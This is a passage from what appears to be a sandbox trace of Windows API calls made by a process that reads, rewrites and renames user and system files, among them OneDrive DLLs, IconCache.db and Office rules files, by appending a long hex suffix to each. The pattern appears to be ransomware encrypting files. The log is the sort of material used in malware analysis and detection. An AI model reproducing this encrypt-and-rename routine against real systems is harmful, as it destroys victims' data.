lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21" [0106.954] GetProcessHeap () returned 0x600000 [0106.954] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x318c3b8 [0106.955] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x318c3b8, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0106.958] CloseHandle (hObject=0x31c) returned 1 [0106.960] GetProcessHeap () returned 0x600000 [0106.960] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.961] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.968] ReadFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.968] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0106.969] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x26fff70) returned 0x0 [0106.970] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml", lpString2=".94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.94F5FEFB71ADE4E241D82CB4057F0ED268B2EC99EA6D0D9918DB88393DFC8F2A" [0106.970] GetProcessHeap () returned 0x600000 [0106.970] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x318c540 [0106.973] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x318c540, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0106.974] CloseHandle (hObject=0x31c) returned 1 [0106.975] GetProcessHeap () returned 0x600000 [0106.975] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.976] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0107.215] WriteFile (in: hFile=0x31c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.216] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0107.280] ReadFile (in: hFile=0x314, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.280] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0107.918] ReadFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0107.918] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0107.919] WriteFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0107.919] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0107.920] WriteFile (in: hFile=0x30c, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0107.920] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0110.982] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x26fff70) returned 0x0 [0110.982] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db", lpString2=".6C4EF3F63A79FECF841C1D432BBDD76F26077F23CDECF39CC98B9F6190C4486A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db.6C4EF3F63A79FECF841C1D432BBDD76F26077F23CDECF39CC98B9F6190C4486A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db.6C4EF3F63A79FECF841C1D432BBDD76F26077F23CDECF39CC98B9F6190C4486A" [0110.982] GetProcessHeap () returned 0x600000 [0110.983] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11e) returned 0x318bb50 [0110.983] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x318bb50, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0110.984] CloseHandle (hObject=0x308) returned 1 [0110.986] GetProcessHeap () returned 0x600000 [0110.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.987] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0111.291] ReadFile (in: hFile=0x324, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0111.303] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0111.303] WriteFile (in: hFile=0x324, lpBuffer=0x6a85c8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 1 [0111.305] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0111.305] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x688540, ReturnLength=0x26fff70) returned 0x0 [0111.305] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml", lpString2=".01A4FF285BA8A6DDA6129DDDEB96539D76518E76C396E248A678A68146E89D2F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml.01A4FF285BA8A6DDA6129DDDEB96539D76518E76C396E248A678A68146E89D2F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml.01A4FF285BA8A6DDA6129DDDEB96539D76518E76C396E248A678A68146E89D2F" [0111.305] GetProcessHeap () returned 0x600000 [0111.306] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x311b118 [0111.306] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x26fff60, FileInformation=0x311b118, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0111.306] CloseHandle (hObject=0x324) returned 1 [0111.308] GetProcessHeap () returned 0x600000 [0111.308] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0111.310] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0111.311] WriteFile (in: hFile=0x328, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.312] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0112.959] ReadFile (in: hFile=0x324, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 0x0 [0112.967] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.182] ReadFile (in: hFile=0x324, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0113.182] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.183] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.187] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.188] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x26fff70) returned 0x0 [0113.188] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\RemoteAccess.dll", lpString2=".4F41DA59E7F258D9B2C7CC0A0F3A92BA7F60204F0FD0EA53E726690459BED53E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\RemoteAccess.dll.4F41DA59E7F258D9B2C7CC0A0F3A92BA7F60204F0FD0EA53E726690459BED53E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\RemoteAccess.dll.4F41DA59E7F258D9B2C7CC0A0F3A92BA7F60204F0FD0EA53E726690459BED53E" [0113.189] GetProcessHeap () returned 0x600000 [0113.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x315c068 [0113.189] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x315c068, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0113.190] CloseHandle (hObject=0x32c) returned 1 [0113.191] GetProcessHeap () returned 0x600000 [0113.191] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.192] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.269] ReadFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.269] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.270] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.270] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.271] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x26fff70) returned 0x0 [0113.272] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\WnsClientApi.dll", lpString2=".36AC11F116282E640113C88183E5EB0AE78501AD9BA8EA35BFB8E2EB9C2A0828" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\WnsClientApi.dll.36AC11F116282E640113C88183E5EB0AE78501AD9BA8EA35BFB8E2EB9C2A0828") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\WnsClientApi.dll.36AC11F116282E640113C88183E5EB0AE78501AD9BA8EA35BFB8E2EB9C2A0828" [0113.272] GetProcessHeap () returned 0x600000 [0113.272] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x315c648 [0113.272] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x26fff60, FileInformation=0x315c648, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0113.275] CloseHandle (hObject=0x330) returned 1 [0113.275] GetProcessHeap () returned 0x600000 [0113.275] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.276] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.311] ReadFile (in: hFile=0x324, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0113.311] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.315] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0113.315] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncApi64.dll", lpString2=".67EB8FDC751E2DC93A63630B30C2F9DDCCF988A918FB7339B07773D943781272" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncApi64.dll.67EB8FDC751E2DC93A63630B30C2F9DDCCF988A918FB7339B07773D943781272") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncApi64.dll.67EB8FDC751E2DC93A63630B30C2F9DDCCF988A918FB7339B07773D943781272" [0113.315] GetProcessHeap () returned 0x600000 [0113.315] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x318b1d0 [0113.315] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x26fff60, FileInformation=0x318b1d0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0113.316] CloseHandle (hObject=0x324) returned 1 [0113.317] GetProcessHeap () returned 0x600000 [0113.317] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.318] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.402] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0113.403] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.445] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.446] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.524] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 0x0 [0113.623] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.678] WriteFile (in: hFile=0x310, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0113.680] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.680] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x26fff70) returned 0x0 [0113.681] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.Resources.dll", lpString2=".310C8FA19C8788B7DC70B4DD0BDE227A35B577798C55FECC486D5670B18F5C7E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.Resources.dll.310C8FA19C8788B7DC70B4DD0BDE227A35B577798C55FECC486D5670B18F5C7E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.Resources.dll.310C8FA19C8788B7DC70B4DD0BDE227A35B577798C55FECC486D5670B18F5C7E" [0113.681] GetProcessHeap () returned 0x600000 [0113.681] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17a) returned 0x318b668 [0113.681] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x26fff60, FileInformation=0x318b668, Length=0x17a, FileInformationClass=0xa) returned 0x0 [0113.681] CloseHandle (hObject=0x310) returned 1 [0113.682] GetProcessHeap () returned 0x600000 [0113.682] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0113.683] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0113.747] ReadFile (in: hFile=0x334, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0113.747] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0114.074] ReadFile (in: hFile=0x330, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0114.075] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0114.077] WriteFile (in: hFile=0x310, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0114.078] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0114.079] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0114.079] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wlmfds.dll", lpString2=".9944B96BD96F75F647C22FF9C5AFC59E5D439B48CD2C81C2146137CDF8C5FB7C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wlmfds.dll.9944B96BD96F75F647C22FF9C5AFC59E5D439B48CD2C81C2146137CDF8C5FB7C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wlmfds.dll.9944B96BD96F75F647C22FF9C5AFC59E5D439B48CD2C81C2146137CDF8C5FB7C" [0114.079] GetProcessHeap () returned 0x600000 [0114.079] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x315f1e8 [0114.079] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x26fff60, FileInformation=0x315f1e8, Length=0x162, FileInformationClass=0xa) returned 0x0 [0114.080] CloseHandle (hObject=0x310) returned 1 [0114.080] GetProcessHeap () returned 0x600000 [0114.080] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: 